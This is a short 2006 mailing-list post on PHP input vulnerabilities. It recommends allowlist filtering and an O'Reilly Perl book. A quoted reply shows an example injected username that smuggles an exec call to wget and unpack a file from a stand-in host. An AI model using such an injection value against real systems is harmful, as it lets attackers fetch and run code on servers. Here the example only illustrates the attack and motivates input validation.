[CS-FSLUG] PHP vulnerabilities?
Yama Ploskonka
Yama at veritasacademy.net
Fri Jun 2 10:08:27 CDT 2006
When I first started using user-input scripts, one of the things I read
about was to filter ALL input to avoid anything bad coming in, in a
subroutine that deals with every input before it is handled on to the
rest of the script.
The suggestion was instead of filtering things _out_ (things like a
backslash), it is safer to filter things allowed in (letters, numbers,
underscore, space, hyphen, period, question mark, exclamation point).
This has been my favorite book for PERL. Originally I photocopied it
from the one copy in the University library in Uruguay, then when
finally in the Land of Plenty was able to buy my own:
CGI Programming with Perl
Guelich, Gundavaram, Birznieks - O'Reilly
The _Security_ chapter is in pp. 194 on. Interesting exposition also of
your responsibility and liability as a coder.
O'Reilly's website last year had it for free download and or reading
Yama
Ed Hurst wrote:
> Tim Young wrote:
>> There are quite a number of ways to do this sort of thing. Most of the
>> time it is a poorly written PHP (or other language) script. The basic
>> thing is when you give someone the ability to input something. For
>> example, a username.
>>
>> Instead of having a username "Tim", they use something like:
>> "Tim; \"exec('wget http://badsite.com/badfile.tgz; tar -xzf
>> badfile.tgz')\""
>
> Excellent explanation! I may never, ever use PHP for anything, but I
> understood the concept. Checking input for a valid user name, and
> warning new users as they register, is thus a hallmark of having RTFM.
>
> Thanks. I'll be using this the next time I get questions from site admins.
>
More information about the Christiansource
mailing list